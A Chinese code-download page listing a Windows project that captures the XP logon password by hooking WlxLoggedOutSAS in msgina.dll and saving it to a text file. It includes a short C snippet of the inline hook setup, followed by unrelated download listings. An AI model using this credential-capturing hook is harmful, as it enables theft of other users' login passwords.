登录
首页 » Windows开发 » 获取XP登录密码

获取XP登录密码

于 2023-08-31 发布 文件大小:401.27 kB
0 189
下载积分: 2 下载次数: 1

代码说明:

应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam) { //得到msgina.dll //hooktable.hMsgina  int n = 0; hooktable.hMsgina = LoadLibrary("msgina.dll"); n  = GetLastError(); if (NULL == hooktable.hMsgina) { printf("getmoduleHandle msgina.dll error"); return -1; } //得到WlxLoggedOutSAS hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS"); if (NULL == hooktable.OldADDR) { printf("GetProcAddress WlxLoggedOutSAS error"); return -1; } int *OpCode = (int*)&hooktable.charJmpCode[1]; int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5; *OpCode = Code; HookWlxLoggedOutSAS(); return 0; }

下载说明:请别用迅雷下载,失败请重下,重下不扣分!

发表评论

0 个回复

  • 这个是wince编程的英文教程,非常的好,学会了这个估计你一个月拿6K以上绝对没问题了...
    这个是wince编程的英文教程,非常的好,学会了这个估计你一个月拿6K以上绝对没问题了-Programming Guide English very well, the estimate of the Institute of you more than a month with 6K absolutely no problem with the
    2022-05-24 14:42:33下载
    积分:1
  • 吉林大学计算机学院图形学编程 ,B样条曲线的绘制方法
    吉林大学计算机学院图形学编程 ,B样条曲线的绘制方法-Jilin University, College of Computer Graphics Programming, B-spline curve drawing method
    2022-03-24 16:55:25下载
    积分:1
  • Get Firmware and IMEI from HS
    Get Firmware and IMEI from HS -Get Firmware and IMEI from HS
    2022-06-30 02:28:11下载
    积分:1
  • 一个枚举当前运行的进程的程序,欢迎大家下载使用,如有问题,请留言联系。...
    一个枚举当前运行的进程的程序,欢迎大家下载使用,如有问题,请留言联系。-an enumeration current operating procedures of the process, all are welcome to download the use, if there are questions, please contact messages.
    2022-04-26 14:05:53下载
    积分:1
  • C#连接SQL Server,需要的同志下载,或许有帮助!
    C#连接SQL Server,需要的同志下载,或许有帮助!-C# to connect SQL Server, the comrades need to download, it might be to help!
    2022-07-18 08:55:15下载
    积分:1
  • 多语言代码编辑器Syn Dev
    用Delphi7写的代码编辑器,支持多语言语法高亮,可通过XML自定义语法。 Features *多语言语法高亮,可自定义 *括号匹配高亮 *代码块匹配画线(彩色线) *多语言自动补全,可自定义 *代码折叠 *代码导出功能 *支持添加自定义命令 *支持编写插件,接口函数int main(hMain HWND, hDll HWND)
    2022-05-25 22:13:24下载
    积分:1
  • Realize parameter identification tips, as the keyword to identify reference Para...
    实现参数的识别提示,作为关键字识别参考ParamTooltip_src.zip-Realize parameter identification tips, as the keyword to identify reference ParamTooltip_src.zip
    2022-03-18 08:20:31下载
    积分:1
  • 实例283——创建Win32 DLL导出一个计算长方体表面积和体积的类
    实例283——创建Win32 DLL导出一个计算长方体表面积和体积的类。
    2022-11-17 03:20:03下载
    积分:1
  • 公差配合查询 v1.4.3.zip
    公差配合查询是免费、绿色、小巧、实用的工具软件。符合《GB/T 1800.3-1998》和《GB/T 1801-1999》中公差与配合的规定。  公差配合查询特点: 1. 基本尺寸范围0~10000,公差等级范围IT01~IT18共20个等级;                                  2. 除 >3150~10000(没有相应配合标准)之外,均采用标准所列配合。其中 " 为常用配合,* 为优先配合;                                  3. “自定义”查询涵盖所有公差,包括IT01、IT0等级的公差和cd、ef、za等特殊公差;  请点击左侧文件开始预览 !预览只提供20%的代码片段,完整代码需下载后查看 加载中 侵权举报
    2023-07-25 06:20:03下载
    积分:1
  • 这是一个可以实现距离3 ~ 6km的通信程序,实现…
    这个是一个可以实现3~6KM距离通讯的程序,实现过程都已经详细注释 硬件采用ADC得到原始数据 然后根据线路得编码情况得到数据 而且针对多节点 带了一个自适应的算法 这样就可以在总线上任意两个终端通讯-Can realize this is a distance of 3 ~ 6KM communications procedures, the realization of the process have been detailed notes ADC hardware used to be the raw data was then coded according to the situation of lines of data and for multi-node with an adaptive algorithm can then be in the bus on any two terminal communications
    2022-01-26 06:19:35下载
    积分:1
  • 696516资源总数
  • 106914会员总数
  • 0今日下载